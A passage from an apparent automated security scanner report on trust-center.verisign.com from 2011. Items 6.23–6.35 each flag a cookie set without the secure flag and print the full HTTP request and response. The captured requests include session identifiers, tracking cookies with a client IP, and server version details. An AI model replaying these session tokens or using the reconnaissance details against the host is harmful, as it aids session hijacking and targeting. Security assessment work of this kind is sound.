The following cookie was issued by the application and does not have the secure flag set:TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/redirect HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:00 GMT Server: ApacheSet-Cookie: TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/console_home?uid=a5f0b94a4c89f47ae217b662fc5fdac5 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
6.23. https://trust-center.verisign.com/process/retail/session_timeout
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/session_timeout
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/session_timeout HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vtrh54nwcc; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=03CA6F76DB2F10DB4BFEB1847A7DDBAF
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:59:40 GMT Server: ApacheSet-Cookie: TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Set-Cookie: JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure Location: http://www.verisign.com/ssl/buy-ssl-certificates/index.html Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html
6.24. https://trust-center.verisign.com/process/retail/trust_initial
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_initial
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_initial?application_locale=VTC_US&promoCode=TSAB9999&UI=PPT HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:26:31 GMT Server: ApacheSet-Cookie: TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/trust_product_selector?uid=54e97416d385e356d49a079c459d836b&product=TRUSTSEAL001 Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html
6.25. https://trust-center.verisign.com/process/retail/trust_product_selector
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_product_selector
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: ApacheSet-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 41019 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> ...[SNIP]...
6.26. https://trust-center.verisign.com/process/retail/trust_product_selector.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_product_selector.do
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_product_selector.do HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:02 GMT Server: ApacheSet-Cookie: TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/trust_capture_tech_contact_details?uid=25a7ccba99f4ee1a587cdec832e34e73 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
6.27. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/TeaLeafTarget.html
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /rcm/TeaLeafTarget.html HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 Content-Length: 1103 X-TeaLeaf-Page-Objects: 0 Origin: https://trust-center.verisign.com X-TeaLeaf-Page-Img-Fail: 1 X-TeaLeaf-Page-Render: 123 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: text/xml X-TeaLeaf-Screen-Res: 4 X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: undefined; INIT X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941 X-TeaLeaf-Browser-Res: 3 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719 <ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" > ...[SNIP]...
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:10 GMT Server: ApacheSet-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 32 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html <html> <body> OK </body> </html>
6.28. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/arrow_progressBar_gray.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/arrow_progressBar_gray.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: ApacheSet-Cookie: TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 91 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a...............................!.......,.......... hs......+RR.N...}...XF.M4....1...;
6.29. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/arrow_progressBar_red.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/arrow_progressBar_red.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: ApacheSet-Cookie: TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 90 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.........3....d.....2Y........!.......,...........(e.......RR.L...}Z..XF.M4.. .M..;
6.30. https://trust-center.verisign.com/rcm/verisign/images/divider.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/divider.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/divider.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 44 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.. ..........!.......,...... ........;
6.31. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/ico_questionmark.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/ico_questionmark.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 374 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....-......8..F.#O.....I.=.2Q.Wu..:...............1Z.\}.*U..B.%K.Bh....Mn....-Q....x.....n..{..n..h}.........................x.....q...4..........................................................[SNIP]...
6.32. https://trust-center.verisign.com/rcm/verisign/images/logo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/logo.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/logo.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: ApacheSet-Cookie: TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 16073 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a..=..................................................................................................................................................................................................[SNIP]...
6.33. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/popup_button_left.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/popup_button_left.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 348 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....................................................................................................................................................................................................[SNIP]...
6.34. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/popup_button_right.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/popup_button_right.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 344 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....................................................................................................................................................................................................[SNIP]...
6.35. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/pricebox_bg.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
